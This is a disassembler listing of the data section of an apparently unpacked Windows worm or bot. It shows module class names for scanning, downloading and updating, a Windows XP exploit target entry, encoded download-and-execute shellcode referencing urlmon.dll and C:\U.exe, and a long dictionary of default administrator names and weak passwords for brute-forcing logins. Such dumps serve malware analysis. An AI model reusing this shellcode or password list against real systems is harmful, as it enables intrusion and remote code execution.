dword_423FD0 dd 14h ; DATA XREF: __umatherr:loc_40FD5E�r
off_423FD4 dd offset aExp ; DATA XREF: __umatherr:loc_40FDCE�r
; "exp"
dd 1Dh, 41DC18h, 1Ah, 41DC08h, 1Bh, 41DC0Ch, 1Fh, 41EE10h
dd 13h, 41EE08h, 21h, 41EE00h, 0Eh, 41DC00h, 0Dh, 41DBF8h
dd 0Fh, 41DBDCh, 10h, 41EDF8h, 5, 41EDF0h, 1Eh, 41DBC0h
dd 12h, 41DBBCh, 20h, 41DBB8h, 0Ch, 41DBD4h, 0Bh, 41DBCCh
dd 15h, 41EDE8h, 1Ch, 41DBC4h, 19h, 41EDE0h, 11h, 41EDD8h
dd 18h, 41EDD0h, 16h, 41EDC8h, 17h, 41EDC0h, 22h, 41EDBCh
dd 23h, 41EDB8h, 24h, 41EDB4h, 25h, 41EDACh, 26h, 41EDA0h
dbl_4240B8 dq 1.797693134862316e308 ; DATA XREF: __handle_exc:loc_40FBF0�r
; __handle_exc:loc_40FBF8�r
dd 0
dd 0FFF80000h
dbl_4240C8 dq 1.797693134862316e308 ; DATA XREF: __handle_exc+89�r
; __handle_exc+A4�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_4240E0 dt 2.3562723457267347066e313 ; DATA XREF: __set_statfp+B�r
; __set_statfp+1E�r
align 4
tbyte_4240EC dt 1.9149954921904370718e-1233 ; DATA XREF: __set_statfp+30�r
align 4
dword_4240F8 dd 1 ; DATA XREF: ___set_fpsr_sse2+1C�r
; ___set_fpsr_sse2+4C�w
byte_4240FC db 3 ; DATA XREF: _abort+1B�r
; _abort:loc_4101FB�r
align 10h
dd 7080h, 1, 0FFFFF1F0h, 0
dword_424110 dd 545350h, 0Fh dup(0) ; DATA XREF: .data:00424190�o
dword_424150 dd 544450h, 0Fh dup(0) ; DATA XREF: .data:00424194�o
dd offset dword_424110
dd offset dword_424150
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch
dword_424218 dd 2 ; DATA XREF: __putwch_nolock+13�r
; __putwch_nolock+4F�r ...
align 10h
dword_424220 dd 0FFFFFFFEh ; DATA XREF: ___termcon:loc_411463�r
dword_424224 dd 0FFFFFFFEh ; DATA XREF: __putwch_nolock+1B�r
; __putwch_nolock:loc_410505�r ...
align 10h
dword_424230 dd 400h ; DATA XREF: sub_411969:loc_411D0D�r
; sub_411969+44D�r
dword_424234 dd 0FFFFFC01h ; DATA XREF: sub_411969:loc_411AD8�r
dword_424238 dd 35h ; DATA XREF: sub_411969+78�r
; sub_411969+176�r ...
dword_42423C dd 0Bh ; DATA XREF: sub_411969:loc_411C74�r
; sub_411969+3AA�r ...
dword_424240 dd 40h ; DATA XREF: sub_411969+519�r
dword_424244 dd 3FFh ; DATA XREF: sub_411969+452�r
; sub_411969:loc_411DCC�r
dword_424248 dd 80h ; DATA XREF: sub_411EAB:loc_41224F�r
; sub_411EAB+44D�r
dword_42424C dd 0FFFFFF81h ; DATA XREF: sub_411EAB:loc_41201A�r
dword_424250 dd 18h ; DATA XREF: sub_411EAB+78�r
; sub_411EAB+176�r ...
dword_424254 dd 8 ; DATA XREF: sub_411EAB:loc_4121B6�r
; sub_411EAB+3AA�r ...
dword_424258 dd 20h ; DATA XREF: sub_411EAB+519�r
dword_42425C dd 7Fh ; DATA XREF: sub_411EAB+452�r
; sub_411EAB:loc_41230E�r
dword_424260 dd 2 dup(0) ; DATA XREF: ___strgtold12_l+363�o
; _$I10_OUTPUT+18E�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_4243C0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: ___strgtold12_l+37A�o
; _$I10_OUTPUT+1B3�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dd offset aBadAllocatio_0 ; "bad allocation"
dd offset aBadAllocatio_1 ; "bad allocation"
dword_424528 dd 4Eh ; DATA XREF: sub_401F1C+81�o
; sub_401F1C+C8�r ...
dd 7 dup(0)
dword_424548 dd 8Bh ; DATA XREF: sub_401F1C+3FE�r
; sub_40251A+77�r ...
dword_42454C dd 0 ; DATA XREF: sub_40251A:loc_40256B�r
; sub_41A8D5+E8�r ...
off_424550 dd offset sub_41A9DE ; DATA XREF: sub_413A2D+20C�r
; sub_413A2D+31D�r ...
dd 4Dh, 7 dup(0)
dd 599h, 0
dd offset sub_41B1A0
dd 53h, 7 dup(0)
dd 0B97h, 0
dd offset sub_41A8D5
dd 0Bh dup(0)
dd offset aBadAllocatio_2 ; "bad allocation"
dword_4245DC dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_41A5C1+205�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 0
dword_424604 dd 6EB4141h, 501E100Dh, 6D6Dh, 41EF94h ; DATA XREF: sub_41A5C1+2B4�o
dword_424614 dd 5C0D0A00h, 2E2F5Fh ; DATA XREF: sub_41A9DE+4A3�o
dword_42461C dd 0EFFFC481h, 44FFFFh, 41EFA4h ; DATA XREF: sub_41A9DE+321�o
dword_424628 dd 42Ah ; DATA XREF: sub_41A9DE+2CB�r
dword_42462C dd 3E8h ; DATA XREF: sub_41A9DE+4ED�r
dword_424630 dd 258h ; DATA XREF: sub_41A9DE+318�r
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dword_424644 dd 20804h ; DATA XREF: sub_41A9DE+506�r
; sub_41A9DE+512�r ...
dd offset aBadAllocatio_4 ; "bad allocation"
dd offset aBadAllocatio_5 ; "bad allocation"
off_424650 dd offset byte_41EF0B ; DATA XREF: sub_41B1A0:loc_41B27D�r
; sub_41B1A0+EE�o
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem_0 ; "system"
dd offset aServer ; "server"
dd offset aRoot_0 ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter_0 ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob_0 ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa_0 ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp_0 ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet_0 ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dd offset aBadAllocatio_6 ; "bad allocation"
dd offset aBadAllocatio_7 ; "bad allocation"
dd offset aBadAllocatio_8 ; "bad allocation"
dd offset aBadAllocatio_9 ; "bad allocation"
dd offset aBadAllocati_10 ; "bad allocation"
dword_424894 dd 22B1C933h, 74D9EED9h, 805BF424h, 8000146Bh, 8300156Bh
; DATA XREF: sub_41411F+78�o
dd 0F3E2FEEBh, 0
dword_4248B0 dd 22B1C933h, 74D9EED9h, 805BF424h, 80001473h, 83001573h
; DATA XREF: sub_41411F+182�o
dd 0F3E2FEEBh, 2 dup(0)
dword_4248D0 dd 758B54EBh, 35748B3Ch, 56F50378h, 320768Bh, 49C933F5h
; DATA XREF: sub_41432A+38�o
dd 0DB33AD41h, 14BE0F36h, 74F23828h, 0DCBC108h, 0EB40DA03h
dd 75DF3BEFh, 5E8B5EE7h, 66DD0324h, 8B4B0C8Bh, 0DD031C5Eh
dd 38B048Bh, 7275C3C5h, 6E6F6D6Ch, 6C6C642Eh, 5C3A4300h
dd 78652E55h, 0C0330065h, 30400364h, 408B0C78h, 1C708B0Ch
dd 8408BADh, 408B09EBh, 7C408D34h, 953C408Bh, 0E4E8EBFh
dd 0FF84E8ECh, 0EC83FFFFh, 242C8304h, 95D0FF3Ch, 1A36BF50h
dd 6FE8702Fh, 8BFFFFFFh, 8DFC2454h, 0DB33BA52h, 0EB525353h
dd 0D0FF5324h, 0FE98BF5Dh, 53E80E8Ah, 83FFFFFFh, 2C8304ECh
dd 0D0FF6224h, 0E0CEEFBFh, 0FF40E860h, 0FF52FFFFh, 0FFD7E8D0h
dd 0FFFFh, 0
dd 0FF000000h, 0FFFF0000h, 0FFFFFF00h, 80000000h, 800000h
dd 8000h, 80h, 4200D0h
dword_4249C0 dd 0 ; DATA XREF: sub_416AE0+6E�r
dword_4249C4 dd 0 ; DATA XREF: sub_416AE0+75�r
dd 0
dd 0FF000000h, 0
dd 0FFFF0000h, 0
dd 0FFFFFF00h, 0
dd 0FFFFFFFFh, 0FF000000h, 0FFFFFFFFh, 0FFFF0000h, 0FFFFFFFFh
dd 0FFFFFF00h, 0FFFFFFFFh
dword_424A00 dd 0 ; DATA XREF: sub_416AE0+8B�r
dword_424A04 dd 80000000h ; DATA XREF: sub_416AE0+91�r
dd 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 80000000h, 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 0
dd offset aBadAllocati_12 ; "bad allocation"
dd offset aBadAllocati_13 ; "bad allocation"
dword_424A48 dd 0BBEDEDF4h, 0E1F0FBFCh, 0FBBBF6E5h, 0E1F0h, 7Ch dup(0)
; DATA XREF: .text:0041C020�o
dword_424C48 dd 0E5F4A6E7h, 0E7A6h, 7Eh dup(0) ; DATA XREF: .text:0041C01B�o
word_424E48 dw 1D45h ; DATA XREF: .text:loc_41C013�r
align 10h
aHjdxzopvuvmrjf db 'hJdXZOPvUVmRJfVS',0 ; DATA XREF: sub_4196D1:loc_4196FC�o
; sub_4196D1+44�r
align 4
dd 1Bh dup(0)
dword_424ED0 dd 0EDF4B6B6h, 0EDh, 3Eh dup(0) ; DATA XREF: sub_41783D+2A9�o
; sub_41783D+375�o ...
dword_424FD0 dd 0D5EDEDF4h, 0D5h, 4 dup(0) ; DATA XREF: sub_41783D+2FF�o
; sub_41783D+38F�o
byte_424FE8 db 2Eh ; DATA XREF: sub_417676+E4�r
byte_424FE9 db 0B8h, 0EDh, 0 ; DATA XREF: sub_41783D+3A5�o
dd 0Dh dup(0)
db 0
byte_425021 db 0BFh, 0D5h, 0F4h ; DATA XREF: sub_41783D+611�o
dd 0FBBBEDEDh, 0E1F0h, 0Dh dup(0)
db 0
byte_425061 db 0EFh, 0F8h, 0FAh ; DATA XREF: sub_401C1D+60�o
; sub_416F86+B8�o ...
dd 0EDF0BBFBh, 0F0h, 1Dh dup(0)
db 0
byte_4250E1 db 0CFh, 0F8h, 0A5h ; DATA XREF: .text:0041BEC5�o
dd 0FBh, 0Ch dup(0)
db 0
byte_425119 db 0CFh, 2 dup(0) ; DATA XREF: sub_416F86+A4�o
; sub_417119+7C�o ...
dd 40h dup(0)
dword_42521C dd 8 ; DATA XREF: sub_41748B+174�r
; sub_41748B+1B1�r
db 78h, 0Ch
byte_425222 db 1 ; DATA XREF: sub_40177B+8F�r
; sub_4019F3+8F�r
align 4
dd offset aBadAllocati_14 ; "bad allocation"
aGdbdADjmGjZJJN db 'У¤¡¤ÓÑ ×ÐÓ¤¦¬Ñ£¦Ó§Ô¦Ð¦ÐÑÑÐÑÖÐÑ ÐѦ§£¤Ö¤Ô¤ÐÔÓÑЧ¤¢§¥ ££ÑÖÐצӥ'
; DATA XREF: sub_40177B+7C�o
db 'Ö¢Ó¬£ÔÖ¡¤£¢¥¡Ô¡Ó¡×Ѭ¬Ó¬¤Ó§£ÖÓЦ§Ð×£¤¢¡¦§ צ¢×פ¡Ð×Ô ÔÖ',0
align 4
dd 70h dup(0)
aNbEdGzDdnbgNdZ db '¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ¬¬¤¡Ð ¬Ô¤Ð£××¢¢¡×£¢§§Ó£¬'
; DATA XREF: sub_4019F3+7C�o
db 'У¬¢¢Ô¡¬§Ó¤Ñ¡¦¥¡¢ÑÓ¤¢¡ÖÐ׬Ԭ ÐÔ¡¦Ö×£¡§ §££¢£××Ч¢×ÑÖ Ð¦Ð ',0
align 4
dd 10h dup(0)
asc_425528 db 'ÛÜÖÞ',0 ; DATA XREF: sub_41802F+216�o
; sub_41829C+27�o
align 10h
db 0
asc_425531 db 'ÅÔÆÆ',0 ; DATA XREF: sub_41802F+13E�o
align 4
db 2 dup(0)
asc_42553A db 'ÀÆÐÇ',0 ; DATA XREF: sub_41802F+227�o
align 10h
db 3 dup(0)
asc_425543 db 'ÅÜÛÒ',0 ; DATA XREF: sub_41783D+1CF�o
dd 0
asc_42554C db 'ÅÚÛÒ',0 ; DATA XREF: sub_41783D+22F�o
align 4
db 0
asc_425555 db 'ÞÜÖÞ',0 ; DATA XREF: sub_41783D+1DF�o
align 4
db 2 dup(0)
asc_42555E db 'ßÚÜÛ',0 ; DATA XREF: sub_41783D+2EC�o
; sub_41783D+355�o
align 4
db 3 dup(0)
asc_425567 db 'ØÚÑÐ',0 ; DATA XREF: sub_41783D+365�o
align 10h
asc_425570 db 'ÅÇÜÃØÆÒ',0 ; DATA XREF: sub_417361+A4�o
; sub_41783D+1EF�o
align 10h
dword_425580 dd 0E5E1E1FDh, 0E2BABAAFh, 0F1BBE2E2h, 0F0FEFBF0h, 0F0E3FAFBh
; DATA XREF: sub_41A5C1+123�o
; sub_41A9DE+408�o
dd 0FBF0F1E7h, 0BBFBF0FEh, 0E2BAF9FBh, 0FAF9F7F0h, 0F8FCBAF2h
dd 0E6F0F2F4h, 0FAF8EFBAh, 0EDF0BBFBh, 0F0h, 420350h
dword_4255BC dd 5348h, 4204B8h, 4204D4h, 4206C8h, 4206D8h, 42070Ch
; DATA XREF: sub_418C40+20�o
; sub_418C40+8E�o
dd 42071Ch, 420734h
dword_4255DC dd 80000002h, 80000001h, 420A4Ch ; DATA XREF: sub_419A9F+6B�o
dword_4255E8 dd 0CA975201h, 0A811D059h, 0D5h, 1Dh dup(0) ; DATA XREF: sub_4198D2+3D�o
dd 9, 0C5C1371Dh, 6379AB46h, 8Fh, 1Dh dup(0)
dd 9, 7D8AAFA8h, 0F4BE11C9h, 8, 1Dh dup(0)
dd 9, 9F499642h, 0F537FD4Ah, 0D6h, 1Dh dup(0)
dd 9, 123485E9h, 411291D9h, 12h, 1Dh dup(0)
dd 9, 5EB02EBh, 0FFFFF9E8h, 0FFh, 1Dh dup(0)
dd 9
off_425900 dd offset off_41D38C ; DATA XREF: .rdata:00420E8C�o
; .rdata:00420EAC�o
align 8
a_?avclsmodule@ db '.?AVclsModule@@',0
off_425918 dd offset off_41D38C ; DATA XREF: .rdata:00420ED4�o
; .rdata:00420EFC�o ...
align 10h
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_425938 dd offset off_41D38C ; DATA XREF: .rdata:00420F24�o
; .rdata:00420F48�o ...
align 10h
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_425958 dd offset off_41D38C ; DATA XREF: .rdata:00420DE4�o
; .rdata:00420F94�o ...
align 10h
a_?avexception@ db '.?AVexception@std@@',0
off_425974 dd offset off_41D38C ; DATA XREF: .rdata:00420F70�o
; .rdata:00420FC8�o ...
dd 0
a_?avbad_alloc@ db '.?AVbad_alloc@std@@',0
off_425990 dd offset off_41D38C ; DATA XREF: .rdata:00420FF0�o
; .rdata:00421014�o
align 8
a_?avmdlupd@@ db '.?AVmdlUPD@@',0
align 4
off_4259A8 dd offset off_41D38C ; DATA XREF: .rdata:0042103C�o
; .rdata:00421060�o
align 10h
a_?avmdldl@@ db '.?AVmdlDL@@',0
off_4259BC dd offset off_41D38C ; DATA XREF: .rdata:00421088�o
; .rdata:004210AC�o
dd 0
a_?avmdlhttpinf db '.?AVmdlHTTPInfo@@',0
align 4
off_4259D8 dd offset off_41D38C ; DATA XREF: .rdata:004210D4�o
; .rdata:004210F8�o
align 10h
a_?avmdlnetinfo db '.?AVmdlNetInfo@@',0
align 4
off_4259F4 dd offset off_41D38C ; DATA XREF: .rdata:00421120�o
; .rdata:00421144�o
dd 0
a_?avmdlsysinfo db '.?AVmdlSysInfo@@',0
align 10h
off_425A10 dd offset off_41D38C ; DATA XREF: .rdata:0042116C�o
; .rdata:00421190�o
align 8
a_?avmdlscansta db '.?AVmdlScanStats@@',0
align 4
off_425A2C dd offset off_41D38C ; DATA XREF: .rdata:004211B8�o
; .rdata:004211DC�o
dd 0
a_?avmdlscansto db '.?AVmdlScanStop@@',0
align 4
off_425A48 dd offset off_41D38C ; DATA XREF: .rdata:00421204�o
; .rdata:00421228�o
align 10h
a_?avmdlscanner db '.?AVmdlScanner@@',0
align 4
dd 7 dup(0)
dword_425A80 dd 0 ; DATA XREF: sub_402E33+4�w
; __invalid_parameter+3�r
dword_425A84 dd 0 ; DATA XREF: operator new(uint)+2B�o
; sub_41C52A�w ...
align 10h
dword_425A90 dd 0 ; DATA XREF: operator new(uint):loc_40306F�r
; operator new(uint)+32�w
; void *dword_425A94
dword_425A94 dd 0 ; DATA XREF: ___tmainCRTStartup+11D�w
; __setenvp:loc_40ABF3�r ...
dd 0
dword_425A9C dd 0 ; DATA XREF: _fast_error_exit�r
; __set_error_mode+15�r ...
dword_425AA0 dd 0 ; DATA XREF: ___report_gsfailure+8F�w
; .rdata:off_41D3F8�o
dword_425AA4 dd 0 ; DATA XREF: ___report_gsfailure+99�w
dd 0
dword_425AAC dd 0 ; DATA XREF: ___report_gsfailure+8A�w
dd 10h dup(0)
dword_425AF0 dd 0 ; DATA XREF: ___report_gsfailure+BF�w
; ___report_gsfailure+DF�r
align 8
dword_425AF8 dd 0 ; DATA XREF: ___report_gsfailure+7B�w
; .rdata:0041D3FC�o
dd 22h dup(0)
word_425B84 dw 0 ; DATA XREF: ___report_gsfailure+4F�w
align 4
word_425B88 dw 0 ; DATA XREF: ___report_gsfailure+48�w
align 4
word_425B8C dw 0 ; DATA XREF: ___report_gsfailure+41�w
align 10h
word_425B90 dw 0 ; DATA XREF: ___report_gsfailure+3A�w
align 4
dword_425B94 dd 0 ; DATA XREF: ___report_gsfailure+26�w
dword_425B98 dd 0 ; DATA XREF: ___report_gsfailure+20�w
dword_425B9C dd 0 ; DATA XREF: ___report_gsfailure+1A�w
dword_425BA0 dd 0 ; DATA XREF: ___report_gsfailure+14�w
dword_425BA4 dd 0 ; DATA XREF: ___report_gsfailure+E�w
dword_425BA8 dd 0 ; DATA XREF: ___report_gsfailure+9�w
dword_425BAC dd 0 ; DATA XREF: ___report_gsfailure+60�w
dword_425BB0 dd 0 ; DATA XREF: ___report_gsfailure+68�w
; ___report_gsfailure+85�r
word_425BB4 dw 0 ; DATA XREF: ___report_gsfailure+33�w
align 4
dword_425BB8 dd 0 ; DATA XREF: ___report_gsfailure+57�w
dword_425BBC dd 0 ; DATA XREF: ___report_gsfailure+70�w
word_425BC0 dw 0 ; DATA XREF: ___report_gsfailure+2C�w
align 4
dd 80h dup(0)
dword_425DC4 dd 0 ; DATA XREF: getSystemCP(int)+15�w
; getSystemCP(int)+1D�w ...
word_425DC8 dw 0 ; DATA XREF: __setmbcp+E7�w
align 4
dd 2 dup(0)
dword_425DD4 dd 4E4h ; DATA XREF: __setmbcp+C3�w
dword_425DD8 dd 0 ; DATA XREF: __setmbcp+CB�w
dword_425DDC dd 0 ; DATA XREF: __setmbcp+D3�w
dword_425DE0 dd 0 ; DATA XREF: __stricmp+6�r
; __strnicmp+6�r ...
dd 8 dup(0)
off_425E04 dd offset sub_4051F6 ; DATA XREF: __mtinit+30�w __mtinit+51�r ...
dword_425E08 dd 77E78B61h ; DATA XREF: ___set_flsgetvalue+10�r
; __mtinit+3D�w ...
dword_425E0C dd 77E79B39h ; DATA XREF: __getptd_noexit+44�r
; __mtinit+4A�w ...
dword_425E10 dd 77E72B29h ; DATA XREF: __mtterm+B�r __mtinit+5E�w ...
align 8
dword_425E18 dd 15B178h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: __mtinitlocks+4�o
; .data:off_423800�o
dword_425E30 dd 15B1A0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423808�o
dword_425E48 dd 15B1C8h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423818�o
dd 15B1F0h, 0FFFFFFFFh, 4 dup(0)
dword_425E78 dd 15B218h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423830�o
dd 15B240h, 0FFFFFFFFh, 4 dup(0)
dd 15B268h, 0FFFFFFFFh, 4 dup(0)
dword_425EC0 dd 15B290h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423850�o
dword_425ED8 dd 15B2B8h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423860�o
dd 15B2E0h, 0FFFFFFFFh, 4 dup(0)
dd 15B308h, 0FFFFFFFFh, 4 dup(0)
dword_425F20 dd 15B410h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423880�o
dd 15B438h, 0FFFFFFFFh, 4 dup(0)
dd 15B460h, 0FFFFFFFFh, 4 dup(0)
dword_425F68 dd 9B0000h ; DATA XREF: __msize+7C�r _free+62�r ...
dword_425F6C dd 0 ; DATA XREF: ___sbh_heap_init+21�w
; ___sbh_free_block+21C�r ...
dword_425F70 dd 0 ; DATA XREF: unknown_libname_53+14�r
; unknown_libname_53+29�r ...
dword_425F74 dd 0 ; DATA XREF: __tsopen_nolock+19E�r
dword_425F78 dd 2 ; DATA XREF: ___tmainCRTStartup+A8�w
; sub_407906:loc_40792E�r ...
dword_425F7C dd 0A28h ; DATA XREF: ___tmainCRTStartup+BF�w
dword_425F80 dd 501h ; DATA XREF: ___tmainCRTStartup+AE�w
dword_425F84 dd 5 ; DATA XREF: ___tmainCRTStartup+B3�w
; sub_40793D+30�r
dword_425F88 dd 1 ; DATA XREF: ___tmainCRTStartup+B9�w
dword_425F8C dd 1 ; DATA XREF: __setargv+A2�w
dword_425F90 dd 9B2BA8h ; DATA XREF: __setargv+A7�w
align 8
; void *dword_425F98
dword_425F98 dd 9B2BC8h ; DATA XREF: __setenvp+4B�w
; __setenvp:loc_40ACA6�r ...
dd 3 dup(0)
off_425FA8 dd offset aCM_unpackerPac ; DATA XREF: __setargv+37�w
; "C:\\m_unpacker\\packed.exe"
align 10h
byte_425FB0 db 0 ; DATA XREF: _doexit+2C�w
; ___endstdio+5�r
align 4
dword_425FB4 dd 0 ; DATA XREF: _doexit+23�w
dword_425FB8 dd 0 ; DATA XREF: _doexit+1B�r _doexit+A0�w
dword_425FBC dd 0 ; DATA XREF: sub_407F55+27�o
; void *dword_425FC0
dword_425FC0 dd 0 ; DATA XREF: sub_407F55+22�r
dword_425FC4 dd 0 ; DATA XREF: sub_408058+4�w __callnewh�r
dword_425FC8 dd 2 ; DATA XREF: __openfile+280�w
; __stbuf:loc_408751�w ...
dd 3 dup(0)
; char Dst[]
Dst db 19h dup(0) ; DATA XREF: __NMSG_WRITE+66�o
; char byte_425FF1[]
